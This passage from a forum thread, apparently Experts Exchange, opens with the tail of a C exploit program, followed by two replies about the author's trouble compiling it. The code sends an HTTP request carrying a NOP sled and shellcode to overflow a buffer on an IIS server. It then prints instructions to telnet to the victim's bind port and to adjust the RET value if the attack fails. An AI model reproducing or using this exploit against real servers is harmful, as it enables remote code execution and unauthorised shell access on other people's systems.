  sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
  strcpy(buffer+strlen(buffer), body);
 
  // This byte is used to mark the beginning of the shellcode
  memset(buffer+strlen(buffer), 0x01, 1);
 
  // And finally, we land into our shellcode
  memset(buffer+strlen(buffer), NOP, 3);
  strcpy(buffer+strlen(buffer), shellcode);
 
  // Send request
  if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
        {
          perror("Failed to send");
          exit(-7);
        }

  printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);

  // Receive response
  while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
        rt += r;
  // This code is not bullet-proof. An evil WWW server could return a response
  // and an overflow would occur here. Yes, I'm lazy... :-)
 
  buffer[rt] = '\0';
 
  if (rt > 0)
        printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
  else
    printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
 
  close(s);

}

0
 
GaryFxCommented:
I just tried it on RedHat 6.1 with gcc 2.95.2.  I got no errors, though I did get unrelated warnings when I compiled it with -Wall.  

This suggests that the problem is with your .h include files.  Perhaps you're getting the wrong ones, or you don't have the right one, or some preprocessor symbol is misdefined.  It's difficult to say.  Personally, when I'm faced with such problems, I compile with -E which produces the result of the preprocessor.  This lets me see exactly which files are included and whether any sections are skipped due to preprocessor symbols.  But it is a tedious approach.

Gary
0
 
MtMAuthor Commented:
Well, that just pisses me off ;-)  I'll figure out how to get this stuff compiled sometime.

MtM
0

Featured Post

VIDEO: THE CONCERTO CLOUD FOR HEALTHCARE

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

  • 16
  • 4
  • 4
  • +2
Tackle projects and never again get stuck behind a technical roadblock.
Join Now